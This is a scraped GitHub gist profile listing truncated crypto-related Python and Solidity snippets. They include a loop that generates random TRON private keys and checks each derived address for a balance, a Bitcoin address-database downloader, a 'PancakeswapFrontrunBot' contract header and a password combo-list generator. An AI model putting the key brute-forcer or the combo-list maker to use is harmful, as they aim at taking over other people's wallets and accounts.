Skip to content

Instantly share code, notes, and snippets.

View Pymmdrza's full-sized avatar
M M D R Z A . C o M

MMDRZA Pymmdrza

M M D R Z A . C o M
View GitHub Profile
@Pymmdrza
Pymmdrza / TRX_Blockthon.py
Last active June 7, 2023 19:27
TRON Generated Private Key random
from Blockthon.Tron import PrivateKey_To_TRX, Balance_TRX
import os
found = 0
count = 0
while True:
count += 1
privatekey = os.urandom(32).hex()
address = PrivateKey_To_TRX(privatekey)
bal = Balance_TRX(address)
@Pymmdrza
Pymmdrza / hexer.py
Last active July 23, 2022 15:49
Hexer For Create and Generated hex private Key all address (from hexer import mHash)
# =====================================================
# DONATE (BTC) : 16p9y6EstGYcnofGNvUJMEGKiAWhAr1uR8
# Website : Mmdrza.Com
# Email : X4@mmdrza.Com
# Dev.to/Mmdrza
# Github.com/Pymmdrza
# =====================================================
# ||================================||
# ||- ╔╦╗╔╦╗╔╦╗╦═╗╔═╗╔═╗ ╔═╗╔═╗╔╦╗ -||
import time
import requests
import json
import random
import ecdsa
import base58
import random
from Crypto.Hash import keccak
from rich.console import Console
@Pymmdrza
Pymmdrza / ConvertTSV2TXT.py
Last active November 16, 2022 04:45
Convert and Write Row TSV CSV File To Text File Save With Python ( Bitcoin Address List Scrap Database )
# +==================================================
# Owner and Programmer : Mmdrza ~ https://Mmdrza.com
# Telegram ID = @MrPyMmdrza
# Github.Com/PyMmdrza
# ==================================================
# Bitcoin Address List (Database) TSV Download Link :
# Link : http://addresses.loyce.club/blockchair_bitcoin_addresses_and_balance_LATEST.tsv.gz
# ==================================================
import csv
@Pymmdrza
Pymmdrza / FlashLoanWBNB.sol
Created July 27, 2022 12:33
Flash Loan WBNB Contract Code Solidity On Remix
pragma solidity ^0.6.6;
// Import PancakeSwap Libraries Migrator/Exchange/Factory
import "https://github.com/pancakeswap/pancake-swap-periphery/blob/master/contracts/interfaces/IPancakeMigrator.sol";
import "https://github.com/pancakeswap/pancake-swap-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Exchange.sol";
import "https://github.com/pancakeswap/pancake-swap-periphery/blob/master/contracts/interfaces/V1/IUniswapV1Factory.sol";
contract PancakeswapFrontrunBot {
@Pymmdrza
Pymmdrza / 0MMDRZA.md
Last active July 28, 2022 00:31
Download Grabber Barh Link Scrap ICON Format PNG on `FlatIcon` [Database]


New Gist: Download Grabber all Datafile (.png) From FlatIcon.Com and Save Scrap Link Database On Text File : DownnloadFlatIcon.py

import requests
import lxml.html
from rich.console import Console
console = Console()
pg = 10733
z = 0
while True:
html = requests.get("https://sha256.j4ck.com/" + str(pg))
@Pymmdrza
Pymmdrza / Password_Generator.py
Created September 20, 2022 13:22
Password List Generator (Combo List Password Maker) [2022]
import random
from rich import print
one = str(input("[1] First Character For Password? --> Here : "))
two = str(input("[2] Two Character For Password ? ---> Here : "))
three = str(input("[3] Better Use Sample Char Pass .-->Here : "))
how = int(input("[4] How Many Generated Now Password List ? (Just Number) : "))
passlist = [one, two, three]
cha = ['~', '@', '!', '#', '$', '&', '*', '_', '+', '-']
@Pymmdrza
Pymmdrza / VanityBTCAddress.py
Created October 5, 2022 17:25
Vanity Bitcoin Address Generator With Python Script
import random
from rich import print as printx
import bitcoin
import random
import multiprocessing
def Pros():
z = 0
fou = 0
import requests
import json
import time
import wget
import os
from rich import print
import sys
import random